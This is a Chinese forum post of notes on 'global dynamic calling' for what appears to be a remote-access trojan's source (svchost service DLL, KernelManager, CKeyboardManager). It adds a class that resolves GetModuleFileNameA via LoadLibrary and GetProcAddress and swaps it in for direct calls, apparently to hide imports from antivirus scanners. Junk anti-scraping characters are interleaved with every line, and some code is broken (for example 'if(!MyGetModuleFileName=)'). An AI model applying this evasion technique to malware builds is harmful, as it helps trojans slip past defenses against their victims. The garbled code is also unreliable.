[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记
# D. R" b6 P0 ~% o8 {svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
- r" T$ N6 A& Z8 z* {: |----------------------------------------& ^0 b1 }8 D' v& i
DTDY.h：0 s, y5 e7 x0 b% w% @6 C& z
3 m9 b2 |& a; ^: Y8 ~8 e; T
#if _MSC_VER>1000
% \( Q6 Y; C& e/ {) O#pragma once1 V4 Y/ Q6 g4 y6 \% C2 X# a  e
#endif //_MSC_VER>1000
/ }4 N- W& V1 g0 d& o) `0 {: a2 [#include<windows.h>: u1 y2 D- V0 s7 }4 ]% x4 e' U6 g

  f9 b, p0 ]) I$ Y. k3 L: W, Z- {typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
- g8 A6 o. @6 b: ^, P# G0 L8 Kclass DTDY2 c5 e6 G, u1 N; v- @# A
{% {: J! y1 B8 g. Q
public:
: ^* c0 u6 \" H$ o8 o3 d( f. KDTDY();3 ~* Q) j0 f# W- J
virtual ~DTDY();& U+ I# B  ~% }; Q$ \3 E' `1 S
public:
7 O3 U& w6 s( ystatic pGetModuleFileNameA MyGetModuleFileName;
; ^1 j; _9 O. @5 G$ M0 N" w# [2 C$ [$ istatic BOOL FunInitiallization();
, K  D) x9 X, h};6 }3 }7 W" q$ Z9 M9 ]8 h; ?
#endif  @; _- l) S, W* a# z8 Z
----------------------------------------  n' `( Q) i( Y+ @

& ~) |0 h% a3 k' D  n" A( s; yDTDY.cpp:: w* Q# N3 z1 Z& f! H4 C

6 l# N( `  h; z6 x! a; i#include "DTDY.h"- U0 y) t7 d* C0 l9 n
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;9 M8 u4 e) ^7 h# }3 q3 |+ x: B
DTDY:TDY()
1 H, L5 u6 X; o% N" U% X2 Z* Z{
. ]/ b* b$ R+ S' r8 E. P}
% e) ~# A+ Y1 }  Y! MDTDY::~DTDY()" A% V) X. G9 l0 [5 s
{
( `$ m: f% D' ~}+ r8 \$ G0 T6 ]
BOOL DTDY::FunInitiallization()4 _7 M3 {4 V) m/ s: ]/ I8 w, M
{# K9 U4 d8 d. M# M
HMODULE hModule=LoadLibrary("kernel32.dll");
6 ~$ t6 S( r; ^+ y5 [) P. FMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");+ a" S9 d2 x7 {0 O
if(!MyGetModuleFileName=) return FALSE;
* B, n8 c* a4 l2 V) s6 y' q- n6 X0 b9 H# B
return TRUE;" c4 r' L% ]2 E& }
}1 s8 R$ f1 c7 |7 C; ]$ \5 L
----------------------------------------- Q& Y8 G$ q) D5 h8 j7 @
svchost.cpp:: S) C% M; |" Y0 G
5 U7 U0 \( V2 a2 M. [
#include "DTDY.h"# u$ G% e5 v% R0 n$ G; N% {

. @0 k, K9 ~. L! S) G+ @BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
+ G. _8 u. T! l' g: s7 x( b" f" [* E{/ H6 y2 w' r$ H5 C9 |; L
switch(ul_reason_for_call)+ n! b; {7 }/ g1 ~
{
0 |3 N6 k" Z+ r( R. n! Xcase DLL_PROCESS_ATTACH:
. Q: D$ ]2 m3 i5 Rif(!DTDY::FunInitiallization()) return FALSE;
' `, B, C, T* V: {# K
7 a+ q9 h6 T5 qbreak;3 k8 u4 P: i, P- G" s; l
}1 R0 \. n, k# A, y1 y( M
}
! `: _  }: N. r) V
8 l; |7 W4 P  t. K/ [, u+ ~
  s+ I) S# v9 D. w4 SGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
6 `- D2 p4 D, Z( ^9 u! @5 n- c改写为
2 \# K1 \: P" X1 A. _  T* w6 ~DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));+ ?/ r, h' n+ P: `& l9 W! Q
----------------------------------------
# m: B# \6 z- X6 e/ o8 B0 JKernelManager.cpp:) v1 W, F$ N; Z7 g, U- a5 `# i
1 v  c% k7 a0 r0 G' Z& J/ n# B
#include "../DTDY.h"# J5 G+ V* m+ n, ~4 Q# Q6 S, O
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));) x) q" W; A1 [# j( ?7 c
改写为
9 C* p# R( K5 d4 N( S# ^7 bDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));9 I8 [  f5 K1 ?
----------------------------------------